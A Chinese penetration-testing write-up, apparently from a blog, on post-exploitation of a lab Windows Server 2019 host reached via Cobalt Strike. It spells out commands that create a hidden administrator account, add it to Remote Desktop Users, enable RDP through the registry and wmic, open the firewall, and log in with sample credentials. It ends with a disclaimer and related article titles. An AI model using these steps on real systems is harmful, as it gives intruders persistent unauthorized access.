文章目录

  • 0x01 获取window权限(管理员)
  • 0x02 添加用户,并且到管理员组
  • 0x03 开启远程桌面
  • 0x04 添加到远程桌面组
  • 0x05 进行远程
  • 0x06 免责声明

0x01 获取window权限(管理员)

使用cs上线用户
kali:192.168.253.234
window server 2019: 192.168.253.243

0x02 添加用户,并且到管理员组

net user uname pass /add  添加用户名为name,密码为pass
net localgroup Administrators uname /add  将用户名为uname的用户添加到管理员组
net user uname /del 删除uname用户

添加用户,并且查看当前的用户

用户添加到管理员组,并且查看管理员组成员:

0x03 开启远程桌面

设置远程桌面的端口(默认开启3389)
reg add "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /t REG_DWORD /v portnumber /d 3389 /f
开启远程桌面:(1代表开启,0代表关闭)
wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1
开启防火墙通过:
netsh advfirewall firewall add rule name="Remote Desktop" protocol=TCP dir=in localport=3389 action=allow

0x04 添加到远程桌面组

net localgroup "Remote Desktop Users" uname /add 将用户名为uname的用户添加到远程桌面组

0x05 进行远程

rdesktop IP地址
账号:admin123
密码:Admin@123

0x06 免责声明

本文档供学习,请使用者注意使用环境并遵守国家相关法律法规!由于使用不当造成的后果上传者概不负责!

内网渗透-windows远程用户管理相关推荐

  1. 内网渗透-Windows内网渗透

    内网渗透-Windows内网渗透 文章目录 内网渗透-Windows内网渗透 前言 一.信息收集 1.1.SPN 1.2.端口连接 1.3.配置文件 1.4.用户信息 1.6.会话收集 1.7.凭据收 ...

  2. 内网渗透——WINDOWS认证机制之KERBEROS

    之前两篇文章整理了NTLM协议的分析与利用 1.内网渗透--WINDOWS认证机制之NTLM 2.利用netsh抓取连接文件服务器的NET NTLM Hash 本篇文章来学习域内认证的Kerberos ...

  3. 【渗透测试笔记】之【内网渗透——Windows系统散列值获取与防范】

    拓扑图 Windows系统散列值获取 1.通过CS模块获取用户凭证信息 在获取到目标主机权限后,我们可以抓取hash和dump明文密码,这两项功能都需要管理员权限,如果权限不足,先要进行提权操作. 抓 ...

  4. 内网渗透----Windows下信息收集

    一.基础信息收集 使用systeminfo命令查看操作系统版本.架构.补丁情况 Windows-Exploit-Suggester-master -u 参数升级并将数据库下载至本地: -i 参数指定系 ...

  5. 【计算机网络相关】内网穿透介绍以及使用FRP实现内网穿透Windows远程桌面

    ❤️觉得内容不错的话,欢迎点赞收藏加关注

  6. 内网渗透学习-Windows信息收集

    内网渗透学习-Windows信息收集 本章内容主要介绍在获取网站服务器webshell后,怎样对Windows主机进行信息收集,对其网络环境进行分析和利用,主要是一个思路整理,在后续的章节中会整理更详 ...

  7. Windows 内网渗透之攻击域控

    文章目录 内网渗透之攻击域控 前言 高权限读取本地密码 procdump+mimikatz绕过杀软 SYSVOL组策略获取密码 Kerberoasting 暴力破解密码 原理 使用setspn查询sp ...

  8. 红蓝对抗之Windows内网渗透

    无论是渗透测试,还是红蓝对抗,目的都是暴露风险,促进提升安全水平.企业往往在外网布置重兵把守,而内网防护相对来说千疮百孔,所以渗透高手往往通过攻击员工电脑.外网服务.职场WiFi等方式进入内网,然后发 ...

  9. 内网渗透|后渗透之远程桌面

    内网渗透|后渗透之远程桌面 0x00 前言 在渗透过程中拿下一台主机后很多时候会选择开3389进远程桌面查看一下对方主机内有无一些有价值的东西可以利用,但是这也引出了一个问题,只要是登录进程就一定会留 ...

最新文章

  1. 探讨由于死锁或进程阻塞造成的ASP突然不能访问的问题
  2. AWS的EC2上构建一个爬虫
  3. .net语言_Excel处理控件Aspose.Cells v20.3 Java.NET语言开启3月新版功能
  4. 揭秘 .NET 5 和Java 互操作
  5. CF 1635E Cars 二分图 + 拓扑
  6. Laravel 开发扩展包基本流程
  7. c++如何判断两个字符串是否相同?_链表 | 如何判断两个单链表(无环)是否交叉...
  8. 【声源定位】基于matlab不同信噪比下麦克风接收信号【含Matlab源码 546期】
  9. html5 遮罩动画,JavaScript仿flash遮罩动画效果
  10. 如何用程序哄老婆开心
  11. robotframework-ride.py:在python2切换至python3时,ride.py变成了文本格式,不能使用python3打开,此时右键属性,更改……
  12. flying-saucer生成PDF
  13. Line营销机器人2019版
  14. 常用ruby gem
  15. Unity安卓打包设置项目名称为中文名
  16. 周志华机器学习——聚类算法。
  17. java语音识别(科大讯飞版)
  18. 全球变暖java_Java实现第九届蓝桥杯全球变暖
  19. Multi-Modal Answer Validation for Knowledge-Based VQA
  20. 八、十六进制数转换到十进制数

热门文章

  1. 安装transmission实现下载功能
  2. 复现贪吃蛇程序——构造小蛇
  3. fedora14开机后进不去系统
  4. 你使用的授权码与本机不匹配,请重新授权
  5. 无锡清空win8应用商店缓存_喵喵影视 - 支持离线下载的观影应用
  6. Ubuntu系统中安装maven详细教程
  7. GTX 900系列显卡BIOS超频笔记 (Maxwell )
  8. SAR ADC系列2:DFT离散傅里叶变换
  9. GBK转UTF-8,亲测有效
  10. Domain adaptation from daytime to nighttime: A situation-sensitive vehicle detection and traffic…(翻)